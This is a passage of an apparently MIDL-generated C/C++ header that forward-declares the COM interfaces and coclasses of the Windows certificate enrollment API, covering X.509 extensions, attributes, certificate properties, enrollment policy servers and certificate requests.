typedef interface IX509ExtensionAuthorityKeyIdentifier IX509ExtensionAuthorityKeyIdentifier;
#endif 	/* __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__ */


#ifndef __ISmimeCapability_FWD_DEFINED__
#define __ISmimeCapability_FWD_DEFINED__
typedef interface ISmimeCapability ISmimeCapability;
#endif 	/* __ISmimeCapability_FWD_DEFINED__ */


#ifndef __ISmimeCapabilities_FWD_DEFINED__
#define __ISmimeCapabilities_FWD_DEFINED__
typedef interface ISmimeCapabilities ISmimeCapabilities;
#endif 	/* __ISmimeCapabilities_FWD_DEFINED__ */


#ifndef __IX509ExtensionSmimeCapabilities_FWD_DEFINED__
#define __IX509ExtensionSmimeCapabilities_FWD_DEFINED__
typedef interface IX509ExtensionSmimeCapabilities IX509ExtensionSmimeCapabilities;
#endif 	/* __IX509ExtensionSmimeCapabilities_FWD_DEFINED__ */


#ifndef __IPolicyQualifier_FWD_DEFINED__
#define __IPolicyQualifier_FWD_DEFINED__
typedef interface IPolicyQualifier IPolicyQualifier;
#endif 	/* __IPolicyQualifier_FWD_DEFINED__ */


#ifndef __IPolicyQualifiers_FWD_DEFINED__
#define __IPolicyQualifiers_FWD_DEFINED__
typedef interface IPolicyQualifiers IPolicyQualifiers;
#endif 	/* __IPolicyQualifiers_FWD_DEFINED__ */


#ifndef __ICertificatePolicy_FWD_DEFINED__
#define __ICertificatePolicy_FWD_DEFINED__
typedef interface ICertificatePolicy ICertificatePolicy;
#endif 	/* __ICertificatePolicy_FWD_DEFINED__ */


#ifndef __ICertificatePolicies_FWD_DEFINED__
#define __ICertificatePolicies_FWD_DEFINED__
typedef interface ICertificatePolicies ICertificatePolicies;
#endif 	/* __ICertificatePolicies_FWD_DEFINED__ */


#ifndef __IX509ExtensionCertificatePolicies_FWD_DEFINED__
#define __IX509ExtensionCertificatePolicies_FWD_DEFINED__
typedef interface IX509ExtensionCertificatePolicies IX509ExtensionCertificatePolicies;
#endif 	/* __IX509ExtensionCertificatePolicies_FWD_DEFINED__ */


#ifndef __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__
#define __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__
typedef interface IX509ExtensionMSApplicationPolicies IX509ExtensionMSApplicationPolicies;
#endif 	/* __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__ */


#ifndef __IX509Attribute_FWD_DEFINED__
#define __IX509Attribute_FWD_DEFINED__
typedef interface IX509Attribute IX509Attribute;
#endif 	/* __IX509Attribute_FWD_DEFINED__ */


#ifndef __IX509Attributes_FWD_DEFINED__
#define __IX509Attributes_FWD_DEFINED__
typedef interface IX509Attributes IX509Attributes;
#endif 	/* __IX509Attributes_FWD_DEFINED__ */


#ifndef __IX509AttributeExtensions_FWD_DEFINED__
#define __IX509AttributeExtensions_FWD_DEFINED__
typedef interface IX509AttributeExtensions IX509AttributeExtensions;
#endif 	/* __IX509AttributeExtensions_FWD_DEFINED__ */


#ifndef __IX509AttributeClientId_FWD_DEFINED__
#define __IX509AttributeClientId_FWD_DEFINED__
typedef interface IX509AttributeClientId IX509AttributeClientId;
#endif 	/* __IX509AttributeClientId_FWD_DEFINED__ */


#ifndef __IX509AttributeRenewalCertificate_FWD_DEFINED__
#define __IX509AttributeRenewalCertificate_FWD_DEFINED__
typedef interface IX509AttributeRenewalCertificate IX509AttributeRenewalCertificate;
#endif 	/* __IX509AttributeRenewalCertificate_FWD_DEFINED__ */


#ifndef __IX509AttributeArchiveKey_FWD_DEFINED__
#define __IX509AttributeArchiveKey_FWD_DEFINED__
typedef interface IX509AttributeArchiveKey IX509AttributeArchiveKey;
#endif 	/* __IX509AttributeArchiveKey_FWD_DEFINED__ */


#ifndef __IX509AttributeArchiveKeyHash_FWD_DEFINED__
#define __IX509AttributeArchiveKeyHash_FWD_DEFINED__
typedef interface IX509AttributeArchiveKeyHash IX509AttributeArchiveKeyHash;
#endif 	/* __IX509AttributeArchiveKeyHash_FWD_DEFINED__ */


#ifndef __IX509AttributeOSVersion_FWD_DEFINED__
#define __IX509AttributeOSVersion_FWD_DEFINED__
typedef interface IX509AttributeOSVersion IX509AttributeOSVersion;
#endif 	/* __IX509AttributeOSVersion_FWD_DEFINED__ */


#ifndef __IX509AttributeCspProvider_FWD_DEFINED__
#define __IX509AttributeCspProvider_FWD_DEFINED__
typedef interface IX509AttributeCspProvider IX509AttributeCspProvider;
#endif 	/* __IX509AttributeCspProvider_FWD_DEFINED__ */


#ifndef __ICryptAttribute_FWD_DEFINED__
#define __ICryptAttribute_FWD_DEFINED__
typedef interface ICryptAttribute ICryptAttribute;
#endif 	/* __ICryptAttribute_FWD_DEFINED__ */


#ifndef __ICryptAttributes_FWD_DEFINED__
#define __ICryptAttributes_FWD_DEFINED__
typedef interface ICryptAttributes ICryptAttributes;
#endif 	/* __ICryptAttributes_FWD_DEFINED__ */


#ifndef __ICertProperty_FWD_DEFINED__
#define __ICertProperty_FWD_DEFINED__
typedef interface ICertProperty ICertProperty;
#endif 	/* __ICertProperty_FWD_DEFINED__ */


#ifndef __ICertProperties_FWD_DEFINED__
#define __ICertProperties_FWD_DEFINED__
typedef interface ICertProperties ICertProperties;
#endif 	/* __ICertProperties_FWD_DEFINED__ */


#ifndef __ICertPropertyFriendlyName_FWD_DEFINED__
#define __ICertPropertyFriendlyName_FWD_DEFINED__
typedef interface ICertPropertyFriendlyName ICertPropertyFriendlyName;
#endif 	/* __ICertPropertyFriendlyName_FWD_DEFINED__ */


#ifndef __ICertPropertyDescription_FWD_DEFINED__
#define __ICertPropertyDescription_FWD_DEFINED__
typedef interface ICertPropertyDescription ICertPropertyDescription;
#endif 	/* __ICertPropertyDescription_FWD_DEFINED__ */


#ifndef __ICertPropertyAutoEnroll_FWD_DEFINED__
#define __ICertPropertyAutoEnroll_FWD_DEFINED__
typedef interface ICertPropertyAutoEnroll ICertPropertyAutoEnroll;
#endif 	/* __ICertPropertyAutoEnroll_FWD_DEFINED__ */


#ifndef __ICertPropertyRequestOriginator_FWD_DEFINED__
#define __ICertPropertyRequestOriginator_FWD_DEFINED__
typedef interface ICertPropertyRequestOriginator ICertPropertyRequestOriginator;
#endif 	/* __ICertPropertyRequestOriginator_FWD_DEFINED__ */


#ifndef __ICertPropertySHA1Hash_FWD_DEFINED__
#define __ICertPropertySHA1Hash_FWD_DEFINED__
typedef interface ICertPropertySHA1Hash ICertPropertySHA1Hash;
#endif 	/* __ICertPropertySHA1Hash_FWD_DEFINED__ */


#ifndef __ICertPropertyKeyProvInfo_FWD_DEFINED__
#define __ICertPropertyKeyProvInfo_FWD_DEFINED__
typedef interface ICertPropertyKeyProvInfo ICertPropertyKeyProvInfo;
#endif 	/* __ICertPropertyKeyProvInfo_FWD_DEFINED__ */


#ifndef __ICertPropertyArchived_FWD_DEFINED__
#define __ICertPropertyArchived_FWD_DEFINED__
typedef interface ICertPropertyArchived ICertPropertyArchived;
#endif 	/* __ICertPropertyArchived_FWD_DEFINED__ */


#ifndef __ICertPropertyBackedUp_FWD_DEFINED__
#define __ICertPropertyBackedUp_FWD_DEFINED__
typedef interface ICertPropertyBackedUp ICertPropertyBackedUp;
#endif 	/* __ICertPropertyBackedUp_FWD_DEFINED__ */


#ifndef __ICertPropertyEnrollment_FWD_DEFINED__
#define __ICertPropertyEnrollment_FWD_DEFINED__
typedef interface ICertPropertyEnrollment ICertPropertyEnrollment;
#endif 	/* __ICertPropertyEnrollment_FWD_DEFINED__ */


#ifndef __ICertPropertyRenewal_FWD_DEFINED__
#define __ICertPropertyRenewal_FWD_DEFINED__
typedef interface ICertPropertyRenewal ICertPropertyRenewal;
#endif 	/* __ICertPropertyRenewal_FWD_DEFINED__ */


#ifndef __ICertPropertyArchivedKeyHash_FWD_DEFINED__
#define __ICertPropertyArchivedKeyHash_FWD_DEFINED__
typedef interface ICertPropertyArchivedKeyHash ICertPropertyArchivedKeyHash;
#endif 	/* __ICertPropertyArchivedKeyHash_FWD_DEFINED__ */


#ifndef __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__
#define __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__
typedef interface ICertPropertyEnrollmentPolicyServer ICertPropertyEnrollmentPolicyServer;
#endif 	/* __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __IX509SignatureInformation_FWD_DEFINED__
#define __IX509SignatureInformation_FWD_DEFINED__
typedef interface IX509SignatureInformation IX509SignatureInformation;
#endif 	/* __IX509SignatureInformation_FWD_DEFINED__ */


#ifndef __ISignerCertificate_FWD_DEFINED__
#define __ISignerCertificate_FWD_DEFINED__
typedef interface ISignerCertificate ISignerCertificate;
#endif 	/* __ISignerCertificate_FWD_DEFINED__ */


#ifndef __ISignerCertificates_FWD_DEFINED__
#define __ISignerCertificates_FWD_DEFINED__
typedef interface ISignerCertificates ISignerCertificates;
#endif 	/* __ISignerCertificates_FWD_DEFINED__ */


#ifndef __IX509NameValuePair_FWD_DEFINED__
#define __IX509NameValuePair_FWD_DEFINED__
typedef interface IX509NameValuePair IX509NameValuePair;
#endif 	/* __IX509NameValuePair_FWD_DEFINED__ */


#ifndef __IX509NameValuePairs_FWD_DEFINED__
#define __IX509NameValuePairs_FWD_DEFINED__
typedef interface IX509NameValuePairs IX509NameValuePairs;
#endif 	/* __IX509NameValuePairs_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplate_FWD_DEFINED__
#define __IX509CertificateTemplate_FWD_DEFINED__
typedef interface IX509CertificateTemplate IX509CertificateTemplate;
#endif 	/* __IX509CertificateTemplate_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplates_FWD_DEFINED__
#define __IX509CertificateTemplates_FWD_DEFINED__
typedef interface IX509CertificateTemplates IX509CertificateTemplates;
#endif 	/* __IX509CertificateTemplates_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplateWritable_FWD_DEFINED__
#define __IX509CertificateTemplateWritable_FWD_DEFINED__
typedef interface IX509CertificateTemplateWritable IX509CertificateTemplateWritable;
#endif 	/* __IX509CertificateTemplateWritable_FWD_DEFINED__ */


#ifndef __ICertificationAuthority_FWD_DEFINED__
#define __ICertificationAuthority_FWD_DEFINED__
typedef interface ICertificationAuthority ICertificationAuthority;
#endif 	/* __ICertificationAuthority_FWD_DEFINED__ */


#ifndef __ICertificationAuthorities_FWD_DEFINED__
#define __ICertificationAuthorities_FWD_DEFINED__
typedef interface ICertificationAuthorities ICertificationAuthorities;
#endif 	/* __ICertificationAuthorities_FWD_DEFINED__ */


#ifndef __IX509EnrollmentPolicyServer_FWD_DEFINED__
#define __IX509EnrollmentPolicyServer_FWD_DEFINED__
typedef interface IX509EnrollmentPolicyServer IX509EnrollmentPolicyServer;
#endif 	/* __IX509EnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __IX509PolicyServerUrl_FWD_DEFINED__
#define __IX509PolicyServerUrl_FWD_DEFINED__
typedef interface IX509PolicyServerUrl IX509PolicyServerUrl;
#endif 	/* __IX509PolicyServerUrl_FWD_DEFINED__ */


#ifndef __IX509PolicyServerListManager_FWD_DEFINED__
#define __IX509PolicyServerListManager_FWD_DEFINED__
typedef interface IX509PolicyServerListManager IX509PolicyServerListManager;
#endif 	/* __IX509PolicyServerListManager_FWD_DEFINED__ */


#ifndef __IX509CertificateRequest_FWD_DEFINED__
#define __IX509CertificateRequest_FWD_DEFINED__
typedef interface IX509CertificateRequest IX509CertificateRequest;
#endif 	/* __IX509CertificateRequest_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10 IX509CertificateRequestPkcs10;
#endif 	/* __IX509CertificateRequestPkcs10_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V2_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V2_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V2 IX509CertificateRequestPkcs10V2;
#endif 	/* __IX509CertificateRequestPkcs10V2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate_FWD_DEFINED__
#define __IX509CertificateRequestCertificate_FWD_DEFINED__
typedef interface IX509CertificateRequestCertificate IX509CertificateRequestCertificate;
#endif 	/* __IX509CertificateRequestCertificate_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate2_FWD_DEFINED__
#define __IX509CertificateRequestCertificate2_FWD_DEFINED__
typedef interface IX509CertificateRequestCertificate2 IX509CertificateRequestCertificate2;
#endif 	/* __IX509CertificateRequestCertificate2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7_FWD_DEFINED__
#define __IX509CertificateRequestPkcs7_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs7 IX509CertificateRequestPkcs7;
#endif 	/* __IX509CertificateRequestPkcs7_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7V2_FWD_DEFINED__
#define __IX509CertificateRequestPkcs7V2_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs7V2 IX509CertificateRequestPkcs7V2;
#endif 	/* __IX509CertificateRequestPkcs7V2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCmc_FWD_DEFINED__
#define __IX509CertificateRequestCmc_FWD_DEFINED__
typedef interface IX509CertificateRequestCmc IX509CertificateRequestCmc;
#endif 	/* __IX509CertificateRequestCmc_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCmc2_FWD_DEFINED__
#define __IX509CertificateRequestCmc2_FWD_DEFINED__
typedef interface IX509CertificateRequestCmc2 IX509CertificateRequestCmc2;
#endif 	/* __IX509CertificateRequestCmc2_FWD_DEFINED__ */


#ifndef __IX509Enrollment_FWD_DEFINED__
#define __IX509Enrollment_FWD_DEFINED__
typedef interface IX509Enrollment IX509Enrollment;
#endif 	/* __IX509Enrollment_FWD_DEFINED__ */


#ifndef __IX509Enrollment2_FWD_DEFINED__
#define __IX509Enrollment2_FWD_DEFINED__
typedef interface IX509Enrollment2 IX509Enrollment2;
#endif 	/* __IX509Enrollment2_FWD_DEFINED__ */


#ifndef __IX509EnrollmentHelper_FWD_DEFINED__
#define __IX509EnrollmentHelper_FWD_DEFINED__
typedef interface IX509EnrollmentHelper IX509EnrollmentHelper;
#endif 	/* __IX509EnrollmentHelper_FWD_DEFINED__ */


#ifndef __IX509EnrollmentWebClassFactory_FWD_DEFINED__
#define __IX509EnrollmentWebClassFactory_FWD_DEFINED__
typedef interface IX509EnrollmentWebClassFactory IX509EnrollmentWebClassFactory;
#endif 	/* __IX509EnrollmentWebClassFactory_FWD_DEFINED__ */


#ifndef __IX509MachineEnrollmentFactory_FWD_DEFINED__
#define __IX509MachineEnrollmentFactory_FWD_DEFINED__
typedef interface IX509MachineEnrollmentFactory IX509MachineEnrollmentFactory;
#endif 	/* __IX509MachineEnrollmentFactory_FWD_DEFINED__ */


#ifndef __CObjectId_FWD_DEFINED__
#define __CObjectId_FWD_DEFINED__

#ifdef __cplusplus
typedef class CObjectId CObjectId;
#else
typedef struct CObjectId CObjectId;
#endif /* __cplusplus */

#endif 	/* __CObjectId_FWD_DEFINED__ */


#ifndef __CObjectIds_FWD_DEFINED__
#define __CObjectIds_FWD_DEFINED__

#ifdef __cplusplus
typedef class CObjectIds CObjectIds;
#else
typedef struct CObjectIds CObjectIds;
#endif /* __cplusplus */

#endif 	/* __CObjectIds_FWD_DEFINED__ */


#ifndef __CBinaryConverter_FWD_DEFINED__
#define __CBinaryConverter_FWD_DEFINED__

#ifdef __cplusplus
typedef class CBinaryConverter CBinaryConverter;
#else
typedef struct CBinaryConverter CBinaryConverter;
#endif /* __cplusplus */

#endif 	/* __CBinaryConverter_FWD_DEFINED__ */


#ifndef __CX500DistinguishedName_FWD_DEFINED__
#define __CX500DistinguishedName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX500DistinguishedName CX500DistinguishedName;
#else
typedef struct CX500DistinguishedName CX500DistinguishedName;
#endif /* __cplusplus */

#endif 	/* __CX500DistinguishedName_FWD_DEFINED__ */


#ifndef __CCspInformation_FWD_DEFINED__
#define __CCspInformation_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspInformation CCspInformation;
#else
typedef struct CCspInformation CCspInformation;
#endif /* __cplusplus */

#endif 	/* __CCspInformation_FWD_DEFINED__ */


#ifndef __CCspInformations_FWD_DEFINED__
#define __CCspInformations_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspInformations CCspInformations;
#else
typedef struct CCspInformations CCspInformations;
#endif /* __cplusplus */

#endif 	/* __CCspInformations_FWD_DEFINED__ */


#ifndef __CCspStatus_FWD_DEFINED__
#define __CCspStatus_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspStatus CCspStatus;
#else
typedef struct CCspStatus CCspStatus;
#endif /* __cplusplus */

#endif 	/* __CCspStatus_FWD_DEFINED__ */


#ifndef __CX509PublicKey_FWD_DEFINED__
#define __CX509PublicKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PublicKey CX509PublicKey;
#else
typedef struct CX509PublicKey CX509PublicKey;
#endif /* __cplusplus */

#endif 	/* __CX509PublicKey_FWD_DEFINED__ */


#ifndef __CX509PrivateKey_FWD_DEFINED__
#define __CX509PrivateKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PrivateKey CX509PrivateKey;
#else
typedef struct CX509PrivateKey CX509PrivateKey;
#endif /* __cplusplus */

#endif 	/* __CX509PrivateKey_FWD_DEFINED__ */


#ifndef __CX509Extension_FWD_DEFINED__
#define __CX509Extension_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Extension CX509Extension;
#else
typedef struct CX509Extension CX509Extension;
#endif /* __cplusplus */

#endif 	/* __CX509Extension_FWD_DEFINED__ */


#ifndef __CX509Extensions_FWD_DEFINED__
#define __CX509Extensions_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Extensions CX509Extensions;
#else
typedef struct CX509Extensions CX509Extensions;
#endif /* __cplusplus */

#endif 	/* __CX509Extensions_FWD_DEFINED__ */


#ifndef __CX509ExtensionKeyUsage_FWD_DEFINED__
#define __CX509ExtensionKeyUsage_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
#else
typedef struct CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionKeyUsage_FWD_DEFINED__ */


#ifndef __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
#define __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyUsage;
#else
typedef struct CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyUsage;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__ */


#ifndef __CX509ExtensionTemplateName_FWD_DEFINED__
#define __CX509ExtensionTemplateName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionTemplateName CX509ExtensionTemplateName;
#else
typedef struct CX509ExtensionTemplateName CX509ExtensionTemplateName;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionTemplateName_FWD_DEFINED__ */


#ifndef __CX509ExtensionTemplate_FWD_DEFINED__
#define __CX509ExtensionTemplate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionTemplate CX509ExtensionTemplate;
#else
typedef struct CX509ExtensionTemplate CX509ExtensionTemplate;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionTemplate_FWD_DEFINED__ */


#ifndef __CAlternativeName_FWD_DEFINED__
#define __CAlternativeName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CAlternativeName CAlternativeName;
#else
typedef struct CAlternativeName CAlternativeName;
#endif /* __cplusplus */

#endif 	/* __CAlternativeName_FWD_DEFINED__ */


#ifndef __CAlternativeNames_FWD_DEFINED__
#define __CAlternativeNames_FWD_DEFINED__

#ifdef __cplusplus
typedef class CAlternativeNames CAlternativeNames;
#else
typedef struct CAlternativeNames CAlternativeNames;
#endif /* __cplusplus */

#endif 	/* __CAlternativeNames_FWD_DEFINED__ */


#ifndef __CX509ExtensionAlternativeNames_FWD_DEFINED__
#define __CX509ExtensionAlternativeNames_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionAlternativeNames CX509ExtensionAlternativeNames;
#else
typedef struct CX509ExtensionAlternativeNames CX509ExtensionAlternativeNames;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionAlternativeNames_FWD_DEFINED__ */


#ifndef __CX509ExtensionBasicConstraints_FWD_DEFINED__
#define __CX509ExtensionBasicConstraints_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionBasicConstraints CX509ExtensionBasicConstraints;
#else
typedef struct CX509ExtensionBasicConstraints CX509ExtensionBasicConstraints;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionBasicConstraints_FWD_DEFINED__ */


#ifndef __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
#define __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectKeyIdentifier;
#else
typedef struct CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectKeyIdentifier;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__ */


#ifndef __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
#define __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthorityKeyIdentifier;
#else
typedef struct CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthorityKeyIdentifier;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__ */


#ifndef __CSmimeCapability_FWD_DEFINED__
#define __CSmimeCapability_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSmimeCapability CSmimeCapability;
#else
typedef struct CSmimeCapability CSmimeCapability;
#endif /* __cplusplus */

#endif 	/* __CSmimeCapability_FWD_DEFINED__ */


#ifndef __CSmimeCapabilities_FWD_DEFINED__
#define __CSmimeCapabilities_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSmimeCapabilities CSmimeCapabilities;
#else
typedef struct CSmimeCapabilities CSmimeCapabilities;
#endif /* __cplusplus */

#endif 	/* __CSmimeCapabilities_FWD_DEFINED__ */


#ifndef __CX509ExtensionSmimeCapabilities_FWD_DEFINED__
#define __CX509ExtensionSmimeCapabilities_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabilities;
#else
typedef struct CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabilities;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionSmimeCapabilities_FWD_DEFINED__ */


#ifndef __CPolicyQualifier_FWD_DEFINED__
#define __CPolicyQualifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CPolicyQualifier CPolicyQualifier;
#else
typedef struct CPolicyQualifier CPolicyQualifier;
#endif /* __cplusplus */

#endif 	/* __CPolicyQualifier_FWD_DEFINED__ */


#ifndef __CPolicyQualifiers_FWD_DEFINED__
#define __CPolicyQualifiers_FWD_DEFINED__

#ifdef __cplusplus
typedef class CPolicyQualifiers CPolicyQualifiers;
#else
typedef struct CPolicyQualifiers CPolicyQualifiers;
#endif /* __cplusplus */

#endif 	/* __CPolicyQualifiers_FWD_DEFINED__ */


#ifndef __CCertificatePolicy_FWD_DEFINED__
#define __CCertificatePolicy_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificatePolicy CCertificatePolicy;
#else
typedef struct CCertificatePolicy CCertificatePolicy;
#endif /* __cplusplus */

#endif 	/* __CCertificatePolicy_FWD_DEFINED__ */


#ifndef __CCertificatePolicies_FWD_DEFINED__
#define __CCertificatePolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificatePolicies CCertificatePolicies;
#else
typedef struct CCertificatePolicies CCertificatePolicies;
#endif /* __cplusplus */

#endif 	/* __CCertificatePolicies_FWD_DEFINED__ */


#ifndef __CX509ExtensionCertificatePolicies_FWD_DEFINED__
#define __CX509ExtensionCertificatePolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionCertificatePolicies CX509ExtensionCertificatePolicies;
#else
typedef struct CX509ExtensionCertificatePolicies CX509ExtensionCertificatePolicies;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionCertificatePolicies_FWD_DEFINED__ */


#ifndef __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__
#define __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionMSApplicationPolicies CX509ExtensionMSApplicationPolicies;
#else
typedef struct CX509ExtensionMSApplicationPolicies CX509ExtensionMSApplicationPolicies;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__ */


#ifndef __CX509Attribute_FWD_DEFINED__
#define __CX509Attribute_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Attribute CX509Attribute;
#else
typedef struct CX509Attribute CX509Attribute;
#endif /* __cplusplus */

#endif 	/* __CX509Attribute_FWD_DEFINED__ */


#ifndef __CX509Attributes_FWD_DEFINED__
#define __CX509Attributes_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Attributes CX509Attributes;
#else
typedef struct CX509Attributes CX509Attributes;
#endif /* __cplusplus */

#endif 	/* __CX509Attributes_FWD_DEFINED__ */


#ifndef __CX509AttributeExtensions_FWD_DEFINED__
#define __CX509AttributeExtensions_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeExtensions CX509AttributeExtensions;
#else
typedef struct CX509AttributeExtensions CX509AttributeExtensions;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeExtensions_FWD_DEFINED__ */


#ifndef __CX509AttributeClientId_FWD_DEFINED__
#define __CX509AttributeClientId_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeClientId CX509AttributeClientId;
#else
typedef struct CX509AttributeClientId CX509AttributeClientId;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeClientId_FWD_DEFINED__ */


#ifndef __CX509AttributeRenewalCertificate_FWD_DEFINED__
#define __CX509AttributeRenewalCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeRenewalCertificate CX509AttributeRenewalCertificate;
#else
typedef struct CX509AttributeRenewalCertificate CX509AttributeRenewalCertificate;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeRenewalCertificate_FWD_DEFINED__ */


#ifndef __CX509AttributeArchiveKey_FWD_DEFINED__
#define __CX509AttributeArchiveKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeArchiveKey CX509AttributeArchiveKey;
#else
typedef struct CX509AttributeArchiveKey CX509AttributeArchiveKey;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeArchiveKey_FWD_DEFINED__ */


#ifndef __CX509AttributeArchiveKeyHash_FWD_DEFINED__
#define __CX509AttributeArchiveKeyHash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
#else
typedef struct CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeArchiveKeyHash_FWD_DEFINED__ */


#ifndef __CX509AttributeOSVersion_FWD_DEFINED__
#define __CX509AttributeOSVersion_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeOSVersion CX509AttributeOSVersion;
#else
typedef struct CX509AttributeOSVersion CX509AttributeOSVersion;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeOSVersion_FWD_DEFINED__ */


#ifndef __CX509AttributeCspProvider_FWD_DEFINED__
#define __CX509AttributeCspProvider_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeCspProvider CX509AttributeCspProvider;
#else
typedef struct CX509AttributeCspProvider CX509AttributeCspProvider;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeCspProvider_FWD_DEFINED__ */


#ifndef __CCryptAttribute_FWD_DEFINED__
#define __CCryptAttribute_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCryptAttribute CCryptAttribute;
#else
typedef struct CCryptAttribute CCryptAttribute;
#endif /* __cplusplus */

#endif 	/* __CCryptAttribute_FWD_DEFINED__ */


#ifndef __CCryptAttributes_FWD_DEFINED__
#define __CCryptAttributes_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCryptAttributes CCryptAttributes;
#else
typedef struct CCryptAttributes CCryptAttributes;
#endif /* __cplusplus */

#endif 	/* __CCryptAttributes_FWD_DEFINED__ */


#ifndef __CCertProperty_FWD_DEFINED__
#define __CCertProperty_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertProperty CCertProperty;
#else
typedef struct CCertProperty CCertProperty;
#endif /* __cplusplus */

#endif 	/* __CCertProperty_FWD_DEFINED__ */


#ifndef __CCertProperties_FWD_DEFINED__
#define __CCertProperties_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertProperties CCertProperties;
#else
typedef struct CCertProperties CCertProperties;
#endif /* __cplusplus */

#endif 	/* __CCertProperties_FWD_DEFINED__ */


#ifndef __CCertPropertyFriendlyName_FWD_DEFINED__
#define __CCertPropertyFriendlyName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyFriendlyName CCertPropertyFriendlyName;
#else
typedef struct CCertPropertyFriendlyName CCertPropertyFriendlyName;
#endif /* __cplusplus */

